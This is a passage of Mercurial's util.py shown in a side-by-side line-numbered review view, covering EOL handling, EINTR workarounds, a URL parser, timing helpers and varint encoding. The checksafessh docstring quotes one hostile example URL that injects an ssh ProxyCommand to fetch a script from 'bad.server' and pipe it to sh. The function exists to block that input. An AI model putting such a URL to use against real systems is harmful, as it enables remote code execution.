2801 2802 return self._fp.write(self._encode(data))
2802 2803
2803 2804
2804 2805 # Matches a single EOL which can either be a CRLF where repeated CR
2805 2806 # are removed or a LF. We do not care about old Macintosh files, so a
2806 2807 # stray CR is an error.
2807 2808 _eolre = remod.compile(br'\r*\n')
2808 2809
2809 2810
2810 2811 def tolf(s):
2811 2812 return _eolre.sub(b'\n', s)
2812 2813
2813 2814
2814 2815 def tocrlf(s):
2815 2816 return _eolre.sub(b'\r\n', s)
2816 2817
2817 2818
2818 2819 def _crlfwriter(fp):
2819 2820 return transformingwriter(fp, tocrlf)
2820 2821
2821 2822
2822 2823 if pycompat.oslinesep == b'\r\n':
2823 2824 tonativeeol = tocrlf
2824 2825 fromnativeeol = tolf
2825 2826 nativeeolwriter = _crlfwriter
2826 2827 else:
2827 2828 tonativeeol = pycompat.identity
2828 2829 fromnativeeol = pycompat.identity
2829 2830 nativeeolwriter = pycompat.identity
2830 2831
2831 2832 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2832 2833 3,
2833 2834 0,
2834 2835 ):
2835 2836 # There is an issue in CPython that some IO methods do not handle EINTR
2836 2837 # correctly. The following table shows what CPython version (and functions)
2837 2838 # are affected (buggy: has the EINTR bug, okay: otherwise):
2838 2839 #
2839 2840 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2840 2841 # --------------------------------------------------
2841 2842 # fp.__iter__ | buggy | buggy | okay
2842 2843 # fp.read* | buggy | okay [1] | okay
2843 2844 #
2844 2845 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2845 2846 #
2846 2847 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2847 2848 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2848 2849 #
2849 2850 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2850 2851 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2851 2852 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2852 2853 # fp.__iter__ but not other fp.read* methods.
2853 2854 #
2854 2855 # On modern systems like Linux, the "read" syscall cannot be interrupted
2855 2856 # when reading "fast" files like on-disk files. So the EINTR issue only
2856 2857 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2857 2858 # files approximately as "fast" files and use the fast (unsafe) code path,
2858 2859 # to minimize the performance impact.
2859 2860 if sys.version_info >= (2, 7, 4):
2860 2861 # fp.readline deals with EINTR correctly, use it as a workaround.
2861 2862 def _safeiterfile(fp):
2862 2863 return iter(fp.readline, b'')
2863 2864
2864 2865 else:
2865 2866 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2866 2867 # note: this may block longer than necessary because of bufsize.
2867 2868 def _safeiterfile(fp, bufsize=4096):
2868 2869 fd = fp.fileno()
2869 2870 line = b''
2870 2871 while True:
2871 2872 try:
2872 2873 buf = os.read(fd, bufsize)
2873 2874 except OSError as ex:
2874 2875 # os.read only raises EINTR before any data is read
2875 2876 if ex.errno == errno.EINTR:
2876 2877 continue
2877 2878 else:
2878 2879 raise
2879 2880 line += buf
2880 2881 if b'\n' in buf:
2881 2882 splitted = line.splitlines(True)
2882 2883 line = b''
2883 2884 for l in splitted:
2884 2885 if l[-1] == b'\n':
2885 2886 yield l
2886 2887 else:
2887 2888 line = l
2888 2889 if not buf:
2889 2890 break
2890 2891 if line:
2891 2892 yield line
2892 2893
2893 2894 def iterfile(fp):
2894 2895 fastpath = True
2895 2896 if type(fp) is file:
2896 2897 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2897 2898 if fastpath:
2898 2899 return fp
2899 2900 else:
2900 2901 return _safeiterfile(fp)
2901 2902
2902 2903
2903 2904 else:
2904 2905 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2905 2906 def iterfile(fp):
2906 2907 return fp
2907 2908
2908 2909
2909 2910 def iterlines(iterator):
2910 2911 for chunk in iterator:
2911 2912 for line in chunk.splitlines():
2912 2913 yield line
2913 2914
2914 2915
2915 2916 def expandpath(path):
2916 2917 return os.path.expanduser(os.path.expandvars(path))
2917 2918
2918 2919
2919 2920 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2920 2921 """Return the result of interpolating items in the mapping into string s.
2921 2922
2922 2923 prefix is a single character string, or a two character string with
2923 2924 a backslash as the first character if the prefix needs to be escaped in
2924 2925 a regular expression.
2925 2926
2926 2927 fn is an optional function that will be applied to the replacement text
2927 2928 just before replacement.
2928 2929
2929 2930 escape_prefix is an optional flag that allows using doubled prefix for
2930 2931 its escaping.
2931 2932 """
2932 2933 fn = fn or (lambda s: s)
2933 2934 patterns = b'|'.join(mapping.keys())
2934 2935 if escape_prefix:
2935 2936 patterns += b'|' + prefix
2936 2937 if len(prefix) > 1:
2937 2938 prefix_char = prefix[1:]
2938 2939 else:
2939 2940 prefix_char = prefix
2940 2941 mapping[prefix_char] = prefix_char
2941 2942 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2942 2943 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2943 2944
2944 2945
2945 2946 def getport(port):
2946 2947 """Return the port for a given network service.
2947 2948
2948 2949 If port is an integer, it's returned as is. If it's a string, it's
2949 2950 looked up using socket.getservbyname(). If there's no matching
2950 2951 service, error.Abort is raised.
2951 2952 """
2952 2953 try:
2953 2954 return int(port)
2954 2955 except ValueError:
2955 2956 pass
2956 2957
2957 2958 try:
2958 2959 return socket.getservbyname(pycompat.sysstr(port))
2959 2960 except socket.error:
2960 2961 raise error.Abort(
2961 2962 _(b"no port number associated with service '%s'") % port
2962 2963 )
2963 2964
2964 2965
2965 2966 class url(object):
2966 2967 r"""Reliable URL parser.
2967 2968
2968 2969 This parses URLs and provides attributes for the following
2969 2970 components:
2970 2971
2971 2972 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2972 2973
2973 2974 Missing components are set to None. The only exception is
2974 2975 fragment, which is set to '' if present but empty.
2975 2976
2976 2977 If parsefragment is False, fragment is included in query. If
2977 2978 parsequery is False, query is included in path. If both are
2978 2979 False, both fragment and query are included in path.
2979 2980
2980 2981 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2981 2982
2982 2983 Note that for backward compatibility reasons, bundle URLs do not
2983 2984 take host names. That means 'bundle://../' has a path of '../'.
2984 2985
2985 2986 Examples:
2986 2987
2987 2988 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2988 2989 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2989 2990 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2990 2991 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2991 2992 >>> url(b'file:///home/joe/repo')
2992 2993 <url scheme: 'file', path: '/home/joe/repo'>
2993 2994 >>> url(b'file:///c:/temp/foo/')
2994 2995 <url scheme: 'file', path: 'c:/temp/foo/'>
2995 2996 >>> url(b'bundle:foo')
2996 2997 <url scheme: 'bundle', path: 'foo'>
2997 2998 >>> url(b'bundle://../foo')
2998 2999 <url scheme: 'bundle', path: '../foo'>
2999 3000 >>> url(br'c:\foo\bar')
3000 3001 <url path: 'c:\\foo\\bar'>
3001 3002 >>> url(br'\\blah\blah\blah')
3002 3003 <url path: '\\\\blah\\blah\\blah'>
3003 3004 >>> url(br'\\blah\blah\blah#baz')
3004 3005 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3005 3006 >>> url(br'file:///C:\users\me')
3006 3007 <url scheme: 'file', path: 'C:\\users\\me'>
3007 3008
3008 3009 Authentication credentials:
3009 3010
3010 3011 >>> url(b'ssh://joe:xyz@x/repo')
3011 3012 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3012 3013 >>> url(b'ssh://joe@x/repo')
3013 3014 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3014 3015
3015 3016 Query strings and fragments:
3016 3017
3017 3018 >>> url(b'http://host/a?b#c')
3018 3019 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3019 3020 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3020 3021 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3021 3022
3022 3023 Empty path:
3023 3024
3024 3025 >>> url(b'')
3025 3026 <url path: ''>
3026 3027 >>> url(b'#a')
3027 3028 <url path: '', fragment: 'a'>
3028 3029 >>> url(b'http://host/')
3029 3030 <url scheme: 'http', host: 'host', path: ''>
3030 3031 >>> url(b'http://host/#a')
3031 3032 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3032 3033
3033 3034 Only scheme:
3034 3035
3035 3036 >>> url(b'http:')
3036 3037 <url scheme: 'http'>
3037 3038 """
3038 3039
3039 3040 _safechars = b"!~*'()+"
3040 3041 _safepchars = b"/!~*'()+:\\"
3041 3042 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3042 3043
3043 3044 def __init__(self, path, parsequery=True, parsefragment=True):
3044 3045 # We slowly chomp away at path until we have only the path left
3045 3046 self.scheme = self.user = self.passwd = self.host = None
3046 3047 self.port = self.path = self.query = self.fragment = None
3047 3048 self._localpath = True
3048 3049 self._hostport = b''
3049 3050 self._origpath = path
3050 3051
3051 3052 if parsefragment and b'#' in path:
3052 3053 path, self.fragment = path.split(b'#', 1)
3053 3054
3054 3055 # special case for Windows drive letters and UNC paths
3055 3056 if hasdriveletter(path) or path.startswith(b'\\\\'):
3056 3057 self.path = path
3057 3058 return
3058 3059
3059 3060 # For compatibility reasons, we can't handle bundle paths as
3060 3061 # normal URLS
3061 3062 if path.startswith(b'bundle:'):
3062 3063 self.scheme = b'bundle'
3063 3064 path = path[7:]
3064 3065 if path.startswith(b'//'):
3065 3066 path = path[2:]
3066 3067 self.path = path
3067 3068 return
3068 3069
3069 3070 if self._matchscheme(path):
3070 3071 parts = path.split(b':', 1)
3071 3072 if parts[0]:
3072 3073 self.scheme, path = parts
3073 3074 self._localpath = False
3074 3075
3075 3076 if not path:
3076 3077 path = None
3077 3078 if self._localpath:
3078 3079 self.path = b''
3079 3080 return
3080 3081 else:
3081 3082 if self._localpath:
3082 3083 self.path = path
3083 3084 return
3084 3085
3085 3086 if parsequery and b'?' in path:
3086 3087 path, self.query = path.split(b'?', 1)
3087 3088 if not path:
3088 3089 path = None
3089 3090 if not self.query:
3090 3091 self.query = None
3091 3092
3092 3093 # // is required to specify a host/authority
3093 3094 if path and path.startswith(b'//'):
3094 3095 parts = path[2:].split(b'/', 1)
3095 3096 if len(parts) > 1:
3096 3097 self.host, path = parts
3097 3098 else:
3098 3099 self.host = parts[0]
3099 3100 path = None
3100 3101 if not self.host:
3101 3102 self.host = None
3102 3103 # path of file:///d is /d
3103 3104 # path of file:///d:/ is d:/, not /d:/
3104 3105 if path and not hasdriveletter(path):
3105 3106 path = b'/' + path
3106 3107
3107 3108 if self.host and b'@' in self.host:
3108 3109 self.user, self.host = self.host.rsplit(b'@', 1)
3109 3110 if b':' in self.user:
3110 3111 self.user, self.passwd = self.user.split(b':', 1)
3111 3112 if not self.host:
3112 3113 self.host = None
3113 3114
3114 3115 # Don't split on colons in IPv6 addresses without ports
3115 3116 if (
3116 3117 self.host
3117 3118 and b':' in self.host
3118 3119 and not (
3119 3120 self.host.startswith(b'[') and self.host.endswith(b']')
3120 3121 )
3121 3122 ):
3122 3123 self._hostport = self.host
3123 3124 self.host, self.port = self.host.rsplit(b':', 1)
3124 3125 if not self.host:
3125 3126 self.host = None
3126 3127
3127 3128 if (
3128 3129 self.host
3129 3130 and self.scheme == b'file'
3130 3131 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3131 3132 ):
3132 3133 raise error.Abort(
3133 3134 _(b'file:// URLs can only refer to localhost')
3134 3135 )
3135 3136
3136 3137 self.path = path
3137 3138
3138 3139 # leave the query string escaped
3139 3140 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3140 3141 v = getattr(self, a)
3141 3142 if v is not None:
3142 3143 setattr(self, a, urlreq.unquote(v))
3143 3144
3144 3145 @encoding.strmethod
3145 3146 def __repr__(self):
3146 3147 attrs = []
3147 3148 for a in (
3148 3149 b'scheme',
3149 3150 b'user',
3150 3151 b'passwd',
3151 3152 b'host',
3152 3153 b'port',
3153 3154 b'path',
3154 3155 b'query',
3155 3156 b'fragment',
3156 3157 ):
3157 3158 v = getattr(self, a)
3158 3159 if v is not None:
3159 3160 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3160 3161 return b'<url %s>' % b', '.join(attrs)
3161 3162
3162 3163 def __bytes__(self):
3163 3164 r"""Join the URL's components back into a URL string.
3164 3165
3165 3166 Examples:
3166 3167
3167 3168 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3168 3169 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3169 3170 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3170 3171 'http://user:pw@host:80/?foo=bar&baz=42'
3171 3172 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3172 3173 'http://user:pw@host:80/?foo=bar%3dbaz'
3173 3174 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3174 3175 'ssh://user:pw@[::1]:2200//home/joe#'
3175 3176 >>> bytes(url(b'http://localhost:80//'))
3176 3177 'http://localhost:80//'
3177 3178 >>> bytes(url(b'http://localhost:80/'))
3178 3179 'http://localhost:80/'
3179 3180 >>> bytes(url(b'http://localhost:80'))
3180 3181 'http://localhost:80/'
3181 3182 >>> bytes(url(b'bundle:foo'))
3182 3183 'bundle:foo'
3183 3184 >>> bytes(url(b'bundle://../foo'))
3184 3185 'bundle:../foo'
3185 3186 >>> bytes(url(b'path'))
3186 3187 'path'
3187 3188 >>> bytes(url(b'file:///tmp/foo/bar'))
3188 3189 'file:///tmp/foo/bar'
3189 3190 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3190 3191 'file:///c:/tmp/foo/bar'
3191 3192 >>> print(url(br'bundle:foo\bar'))
3192 3193 bundle:foo\bar
3193 3194 >>> print(url(br'file:///D:\data\hg'))
3194 3195 file:///D:\data\hg
3195 3196 """
3196 3197 if self._localpath:
3197 3198 s = self.path
3198 3199 if self.scheme == b'bundle':
3199 3200 s = b'bundle:' + s
3200 3201 if self.fragment:
3201 3202 s += b'#' + self.fragment
3202 3203 return s
3203 3204
3204 3205 s = self.scheme + b':'
3205 3206 if self.user or self.passwd or self.host:
3206 3207 s += b'//'
3207 3208 elif self.scheme and (
3208 3209 not self.path
3209 3210 or self.path.startswith(b'/')
3210 3211 or hasdriveletter(self.path)
3211 3212 ):
3212 3213 s += b'//'
3213 3214 if hasdriveletter(self.path):
3214 3215 s += b'/'
3215 3216 if self.user:
3216 3217 s += urlreq.quote(self.user, safe=self._safechars)
3217 3218 if self.passwd:
3218 3219 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3219 3220 if self.user or self.passwd:
3220 3221 s += b'@'
3221 3222 if self.host:
3222 3223 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3223 3224 s += urlreq.quote(self.host)
3224 3225 else:
3225 3226 s += self.host
3226 3227 if self.port:
3227 3228 s += b':' + urlreq.quote(self.port)
3228 3229 if self.host:
3229 3230 s += b'/'
3230 3231 if self.path:
3231 3232 # TODO: similar to the query string, we should not unescape the
3232 3233 # path when we store it, the path might contain '%2f' = '/',
3233 3234 # which we should *not* escape.
3234 3235 s += urlreq.quote(self.path, safe=self._safepchars)
3235 3236 if self.query:
3236 3237 # we store the query in escaped form.
3237 3238 s += b'?' + self.query
3238 3239 if self.fragment is not None:
3239 3240 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3240 3241 return s
3241 3242
3242 3243 __str__ = encoding.strmethod(__bytes__)
3243 3244
3244 3245 def authinfo(self):
3245 3246 user, passwd = self.user, self.passwd
3246 3247 try:
3247 3248 self.user, self.passwd = None, None
3248 3249 s = bytes(self)
3249 3250 finally:
3250 3251 self.user, self.passwd = user, passwd
3251 3252 if not self.user:
3252 3253 return (s, None)
3253 3254 # authinfo[1] is passed to urllib2 password manager, and its
3254 3255 # URIs must not contain credentials. The host is passed in the
3255 3256 # URIs list because Python < 2.4.3 uses only that to search for
3256 3257 # a password.
3257 3258 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3258 3259
3259 3260 def isabs(self):
3260 3261 if self.scheme and self.scheme != b'file':
3261 3262 return True # remote URL
3262 3263 if hasdriveletter(self.path):
3263 3264 return True # absolute for our purposes - can't be joined()
3264 3265 if self.path.startswith(br'\\'):
3265 3266 return True # Windows UNC path
3266 3267 if self.path.startswith(b'/'):
3267 3268 return True # POSIX-style
3268 3269 return False
3269 3270
3270 3271 def localpath(self):
3271 3272 if self.scheme == b'file' or self.scheme == b'bundle':
3272 3273 path = self.path or b'/'
3273 3274 # For Windows, we need to promote hosts containing drive
3274 3275 # letters to paths with drive letters.
3275 3276 if hasdriveletter(self._hostport):
3276 3277 path = self._hostport + b'/' + self.path
3277 3278 elif (
3278 3279 self.host is not None and self.path and not hasdriveletter(path)
3279 3280 ):
3280 3281 path = b'/' + path
3281 3282 return path
3282 3283 return self._origpath
3283 3284
3284 3285 def islocal(self):
3285 3286 '''whether localpath will return something that posixfile can open'''
3286 3287 return (
3287 3288 not self.scheme
3288 3289 or self.scheme == b'file'
3289 3290 or self.scheme == b'bundle'
3290 3291 )
3291 3292
3292 3293
3293 3294 def hasscheme(path):
3294 3295 return bool(url(path).scheme)
3295 3296
3296 3297
3297 3298 def hasdriveletter(path):
3298 3299 return path and path[1:2] == b':' and path[0:1].isalpha()
3299 3300
3300 3301
3301 3302 def urllocalpath(path):
3302 3303 return url(path, parsequery=False, parsefragment=False).localpath()
3303 3304
3304 3305
3305 3306 def checksafessh(path):
3306 3307 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3307 3308
3308 3309 This is a sanity check for ssh urls. ssh will parse the first item as
3309 3310 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3310 3311 Let's prevent these potentially exploited urls entirely and warn the
3311 3312 user.
3312 3313
3313 3314 Raises an error.Abort when the url is unsafe.
3314 3315 """
3315 3316 path = urlreq.unquote(path)
3316 3317 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3317 3318 raise error.Abort(
3318 3319 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3319 3320 )
3320 3321
3321 3322
3322 3323 def hidepassword(u):
3323 3324 '''hide user credential in a url string'''
3324 3325 u = url(u)
3325 3326 if u.passwd:
3326 3327 u.passwd = b'***'
3327 3328 return bytes(u)
3328 3329
3329 3330
3330 3331 def removeauth(u):
3331 3332 '''remove all authentication information from a url string'''
3332 3333 u = url(u)
3333 3334 u.user = u.passwd = None
3334 3335 return bytes(u)
3335 3336
3336 3337
3337 3338 timecount = unitcountfn(
3338 3339 (1, 1e3, _(b'%.0f s')),
3339 3340 (100, 1, _(b'%.1f s')),
3340 3341 (10, 1, _(b'%.2f s')),
3341 3342 (1, 1, _(b'%.3f s')),
3342 3343 (100, 0.001, _(b'%.1f ms')),
3343 3344 (10, 0.001, _(b'%.2f ms')),
3344 3345 (1, 0.001, _(b'%.3f ms')),
3345 3346 (100, 0.000001, _(b'%.1f us')),
3346 3347 (10, 0.000001, _(b'%.2f us')),
3347 3348 (1, 0.000001, _(b'%.3f us')),
3348 3349 (100, 0.000000001, _(b'%.1f ns')),
3349 3350 (10, 0.000000001, _(b'%.2f ns')),
3350 3351 (1, 0.000000001, _(b'%.3f ns')),
3351 3352 )
3352 3353
3353 3354
3354 3355 @attr.s
3355 3356 class timedcmstats(object):
3356 3357 """Stats information produced by the timedcm context manager on entering."""
3357 3358
3358 3359 # the starting value of the timer as a float (meaning and resulution is
3359 3360 # platform dependent, see util.timer)
3360 3361 start = attr.ib(default=attr.Factory(lambda: timer()))
3361 3362 # the number of seconds as a floating point value; starts at 0, updated when
3362 3363 # the context is exited.
3363 3364 elapsed = attr.ib(default=0)
3364 3365 # the number of nested timedcm context managers.
3365 3366 level = attr.ib(default=1)
3366 3367
3367 3368 def __bytes__(self):
3368 3369 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3369 3370
3370 3371 __str__ = encoding.strmethod(__bytes__)
3371 3372
3372 3373
3373 3374 @contextlib.contextmanager
3374 3375 def timedcm(whencefmt, *whenceargs):
3375 3376 """A context manager that produces timing information for a given context.
3376 3377
3377 3378 On entering a timedcmstats instance is produced.
3378 3379
3379 3380 This context manager is reentrant.
3380 3381
3381 3382 """
3382 3383 # track nested context managers
3383 3384 timedcm._nested += 1
3384 3385 timing_stats = timedcmstats(level=timedcm._nested)
3385 3386 try:
3386 3387 with tracing.log(whencefmt, *whenceargs):
3387 3388 yield timing_stats
3388 3389 finally:
3389 3390 timing_stats.elapsed = timer() - timing_stats.start
3390 3391 timedcm._nested -= 1
3391 3392
3392 3393
3393 3394 timedcm._nested = 0
3394 3395
3395 3396
3396 3397 def timed(func):
3397 3398 '''Report the execution time of a function call to stderr.
3398 3399
3399 3400 During development, use as a decorator when you need to measure
3400 3401 the cost of a function, e.g. as follows:
3401 3402
3402 3403 @util.timed
3403 3404 def foo(a, b, c):
3404 3405 pass
3405 3406 '''
3406 3407
3407 3408 def wrapper(*args, **kwargs):
3408 3409 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3409 3410 result = func(*args, **kwargs)
3410 3411 stderr = procutil.stderr
3411 3412 stderr.write(
3412 3413 b'%s%s: %s\n'
3413 3414 % (
3414 3415 b' ' * time_stats.level * 2,
3415 3416 pycompat.bytestr(func.__name__),
3416 3417 time_stats,
3417 3418 )
3418 3419 )
3419 3420 return result
3420 3421
3421 3422 return wrapper
3422 3423
3423 3424
3424 3425 _sizeunits = (
3425 3426 (b'm', 2 ** 20),
3426 3427 (b'k', 2 ** 10),
3427 3428 (b'g', 2 ** 30),
3428 3429 (b'kb', 2 ** 10),
3429 3430 (b'mb', 2 ** 20),
3430 3431 (b'gb', 2 ** 30),
3431 3432 (b'b', 1),
3432 3433 )
3433 3434
3434 3435
3435 3436 def sizetoint(s):
3436 3437 '''Convert a space specifier to a byte count.
3437 3438
3438 3439 >>> sizetoint(b'30')
3439 3440 30
3440 3441 >>> sizetoint(b'2.2kb')
3441 3442 2252
3442 3443 >>> sizetoint(b'6M')
3443 3444 6291456
3444 3445 '''
3445 3446 t = s.strip().lower()
3446 3447 try:
3447 3448 for k, u in _sizeunits:
3448 3449 if t.endswith(k):
3449 3450 return int(float(t[: -len(k)]) * u)
3450 3451 return int(t)
3451 3452 except ValueError:
3452 3453 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3453 3454
3454 3455
3455 3456 class hooks(object):
3456 3457 '''A collection of hook functions that can be used to extend a
3457 3458 function's behavior. Hooks are called in lexicographic order,
3458 3459 based on the names of their sources.'''
3459 3460
3460 3461 def __init__(self):
3461 3462 self._hooks = []
3462 3463
3463 3464 def add(self, source, hook):
3464 3465 self._hooks.append((source, hook))
3465 3466
3466 3467 def __call__(self, *args):
3467 3468 self._hooks.sort(key=lambda x: x[0])
3468 3469 results = []
3469 3470 for source, hook in self._hooks:
3470 3471 results.append(hook(*args))
3471 3472 return results
3472 3473
3473 3474
3474 3475 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3475 3476 '''Yields lines for a nicely formatted stacktrace.
3476 3477 Skips the 'skip' last entries, then return the last 'depth' entries.
3477 3478 Each file+linenumber is formatted according to fileline.
3478 3479 Each line is formatted according to line.
3479 3480 If line is None, it yields:
3480 3481 length of longest filepath+line number,
3481 3482 filepath+linenumber,
3482 3483 function
3483 3484
3484 3485 Not be used in production code but very convenient while developing.
3485 3486 '''
3486 3487 entries = [
3487 3488 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3488 3489 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3489 3490 ][-depth:]
3490 3491 if entries:
3491 3492 fnmax = max(len(entry[0]) for entry in entries)
3492 3493 for fnln, func in entries:
3493 3494 if line is None:
3494 3495 yield (fnmax, fnln, func)
3495 3496 else:
3496 3497 yield line % (fnmax, fnln, func)
3497 3498
3498 3499
3499 3500 def debugstacktrace(
3500 3501 msg=b'stacktrace',
3501 3502 skip=0,
3502 3503 f=procutil.stderr,
3503 3504 otherf=procutil.stdout,
3504 3505 depth=0,
3505 3506 prefix=b'',
3506 3507 ):
3507 3508 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3508 3509 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3509 3510 By default it will flush stdout first.
3510 3511 It can be used everywhere and intentionally does not require an ui object.
3511 3512 Not be used in production code but very convenient while developing.
3512 3513 '''
3513 3514 if otherf:
3514 3515 otherf.flush()
3515 3516 f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
3516 3517 for line in getstackframes(skip + 1, depth=depth):
3517 3518 f.write(prefix + line)
3518 3519 f.flush()
3519 3520
3520 3521
3521 3522 # convenient shortcut
3522 3523 dst = debugstacktrace
3523 3524
3524 3525
3525 3526 def safename(f, tag, ctx, others=None):
3526 3527 """
3527 3528 Generate a name that it is safe to rename f to in the given context.
3528 3529
3529 3530 f: filename to rename
3530 3531 tag: a string tag that will be included in the new name
3531 3532 ctx: a context, in which the new name must not exist
3532 3533 others: a set of other filenames that the new name must not be in
3533 3534
3534 3535 Returns a file name of the form oldname~tag[~number] which does not exist
3535 3536 in the provided context and is not in the set of other names.
3536 3537 """
3537 3538 if others is None:
3538 3539 others = set()
3539 3540
3540 3541 fn = b'%s~%s' % (f, tag)
3541 3542 if fn not in ctx and fn not in others:
3542 3543 return fn
3543 3544 for n in itertools.count(1):
3544 3545 fn = b'%s~%s~%s' % (f, tag, n)
3545 3546 if fn not in ctx and fn not in others:
3546 3547 return fn
3547 3548
3548 3549
3549 3550 def readexactly(stream, n):
3550 3551 '''read n bytes from stream.read and abort if less was available'''
3551 3552 s = stream.read(n)
3552 3553 if len(s) < n:
3553 3554 raise error.Abort(
3554 3555 _(b"stream ended unexpectedly (got %d bytes, expected %d)")
3555 3556 % (len(s), n)
3556 3557 )
3557 3558 return s
3558 3559
3559 3560
3560 3561 def uvarintencode(value):
3561 3562 """Encode an unsigned integer value to a varint.
3562 3563
3563 3564 A varint is a variable length integer of 1 or more bytes. Each byte
3564 3565 except the last has the most significant bit set. The lower 7 bits of
3565 3566 each byte store the 2's complement representation, least significant group
3566 3567 first.
3567 3568
3568 3569 >>> uvarintencode(0)
3569 3570 '\\x00'
3570 3571 >>> uvarintencode(1)
3571 3572 '\\x01'
3572 3573 >>> uvarintencode(127)
3573 3574 '\\x7f'
3574 3575 >>> uvarintencode(1337)
3575 3576 '\\xb9\\n'
3576 3577 >>> uvarintencode(65536)
3577 3578 '\\x80\\x80\\x04'
3578 3579 >>> uvarintencode(-1)
3579 3580 Traceback (most recent call last):
3580 3581 ...
3581 3582 ProgrammingError: negative value for uvarint: -1
3582 3583 """
3583 3584 if value < 0:
3584 3585 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3585 3586 bits = value & 0x7F
3586 3587 value >>= 7
3587 3588 bytes = []
3588 3589 while value:
3589 3590 bytes.append(pycompat.bytechr(0x80 | bits))
3590 3591 bits = value & 0x7F
3591 3592 value >>= 7
3592 3593 bytes.append(pycompat.bytechr(bits))
3593 3594
3594 3595 return b''.join(bytes)
3595 3596
3596 3597
3597 3598 def uvarintdecodestream(fh):
3598 3599 """Decode an unsigned variable length integer from a stream.
3599 3600
3600 3601 The passed argument is anything that has a ``.read(N)`` method.
3601 3602
3602 3603 >>> try:
3603 3604 ... from StringIO import StringIO as BytesIO
3604 3605 ... except ImportError:
3605 3606 ... from io import BytesIO
3606 3607 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3607 3608 0
3608 3609 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3609 3610 1
3610 3611 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3611 3612 127
3612 3613 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3613 3614 1337
3614 3615 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3615 3616 65536
3616 3617 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3617 3618 Traceback (most recent call last):
3618 3619 ...
3619 3620 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3620 3621 """
3621 3622 result = 0
3622 3623 shift = 0
3623 3624 while True:
3624 3625 byte = ord(readexactly(fh, 1))
3625 3626 result |= (byte & 0x7F) << shift
3626 3627 if not (byte & 0x80):
3627 3628 return result
3628 3629 shift += 7
3630
3631
3632 # Passing the '' locale means that the locale should be set according to the
3633 # user settings (environment variables).
3634 # Python sometimes avoids setting the global locale settings. When interfacing
3635 # with C code (e.g. the curses module or the Subversion bindings), the global
3636 # locale settings must be initialized correctly. Python 2 does not initialize
3637 # the global locale settings on interpreter startup. Python 3 sometimes
3638 # initializes LC_CTYPE, but not consistently at least on Windows. Therefore we
3639 # explicitly initialize it to get consistent behavior if it's not already
3640 # initialized. Since CPython commit 177d921c8c03d30daa32994362023f777624b10d,
3641 # LC_CTYPE is always initialized. If we require Python 3.8+, we should re-check
3642 # if we can remove this code.
3643 @contextlib.contextmanager
3644 def with_lc_ctype():
3645 oldloc = locale.setlocale(locale.LC_CTYPE, None)
3646 if oldloc == 'C':
3647 try:
3648 try:
3649 locale.setlocale(locale.LC_CTYPE, '')
3650 except locale.Error:
3651 # The likely case is that the locale from the environment
3652 # variables is unknown.
3653 pass
3654 yield
3655 finally:
3656 locale.setlocale(locale.LC_CTYPE, oldloc)
3657 else:
3658 yield
General Comments 0
